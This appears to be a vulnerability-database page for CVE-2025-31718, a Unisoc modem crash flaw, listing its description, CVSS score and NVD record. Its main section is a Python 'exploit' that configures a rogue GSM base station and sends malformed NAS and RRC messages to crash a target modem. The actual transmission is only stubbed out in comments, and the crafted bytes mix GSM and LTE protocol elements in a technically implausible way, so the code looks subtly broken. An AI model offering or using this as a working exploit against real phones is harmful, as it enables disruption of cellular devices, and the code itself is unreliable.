CVE-2025-31718

Description

In modem, there is a possible system crash due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Unisoc调制解调器固件（具体受影响版本请参考Unisoc官方安全公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-31718 - Unisoc Modem Input Validation DoS PoC
# This PoC demonstrates the concept of triggering a system crash
# in Unisoc modem via malformed cellular protocol messages.
# Requires a software-defined radio (SDR) setup with a rogue base station.

#!/usr/bin/env python3
"""
CVE-2025-31718 Proof of Concept
Vulnerability: Improper input validation in Unisoc Modem
Impact: Remote system crash (Denial of Service)
CVSS: 7.5 (HIGH)
"""

from scapy.all import *
import struct

class UnisocModemDoS:
    def __init__(self, target_imsi=None, target_tac=None):
        self.target_imsi = target_imsi or "001010000000001"
        self.target_tac = target_tac or "0001"
        self.rogue_bs_config = {
            "arfcn": 100,        # Absolute Radio Frequency Channel Number
            "band": "GSM900",    # Operating band
            "mcc": "001",        # Mobile Country Code
            "mnc": "01",         # Mobile Network Code
            "lac": "0001",       # Location Area Code
            "cell_id": "0001",   # Cell Identity
        }

    def craft_malformed_nas_message(self):
        """
        Craft a malformed NAS (Non-Access Stratum) message
        with invalid length fields to trigger improper input validation.
        """
        # NAS Security Header - indicating integrity protected but malformed
        nas_security_header = b'\x00'
        # Message type - Attach Request (0x01) with malformed payload
        message_type = b'\x01'
        # Intentionally malformed TLV with oversized length field
        malformed_tlv = struct.pack(">BB", 0x80, 0xFF) + b'\x41' * 255

        payload = nas_security_header + message_type + malformed_tlv
        return payload

    def craft_malformed_rrc_message(self):
        """
        Craft a malformed RRC (Radio Resource Control) message
        targeting the modem's input validation weakness.
        """
        # RRC Connection Reconfiguration with invalid configuration
        rrc_message = b'\x30\x00'  # RRC message type
        rrc_message += b'\xFF\xFF'  # Invalid length indicator
        rrc_message += b'\x00' * 512  # Oversized payload
        return rrc_message

    def send_via_sdr(self, message):
        """
        Send the crafted message via SDR (e.g., using gr-gsm or srsRAN)
        This is a conceptual implementation - actual transmission
        requires hardware like USRP B210 or HackRF One.
        """
        print(f"[*] Configuring rogue base station on ARFCN {self.rogue_bs_config['arfcn']}")
        print(f"[*] Target IMSI: {self.target_imsi}")
        print(f"[*] Broadcasting malformed message ({len(message)} bytes)")
        print(f"[!] WARNING: This will cause the target modem to crash")
        # In real implementation:
        # os.system(f"grgsm_livemon -f {self.rogue_bs_config['arfcn']}M")
        # os.system(f"send_burst.py --message {message.hex()}")
        return True

    def exploit(self):
        """Main exploit function"""
        print("=" * 60)
        print("CVE-2025-31718 - Unisoc Modem DoS Exploit")
        print("=" * 60)

        # Step 1: Broadcast on a legitimate ARFCN to attract target
        print("[*] Step 1: Broadcasting as rogue base station...")

        # Step 2: Send malformed NAS message
        print("[*] Step 2: Sending malformed NAS message...")
        nas_msg = self.craft_malformed_nas_message()
        self.send_via_sdr(nas_msg)

        # Step 3: Send malformed RRC message
        print("[*] Step 3: Sending malformed RRC message...")
        rrc_msg = self.craft_malformed_rrc_message()
        self.send_via_sdr(rrc_msg)

        print("[+] Exploit completed - target modem should have crashed")

if __name__ == "__main__":
    exploit = UnisocModemDoS()
    exploit.exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31718
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31718
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31718/
[4] VulDB https://vuldb.com/cve/CVE-2025-31718
[5] https://www.unisoc.com/en/support/announcement/1976557615080263681

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31718", "sourceIdentifier": "[email protected]", "published": "2025-10-11T01:15:33.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In modem, there is a possible system crash due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://www.unisoc.com/en/support/announcement/1976557615080263681", "source": "[email protected]"}]}}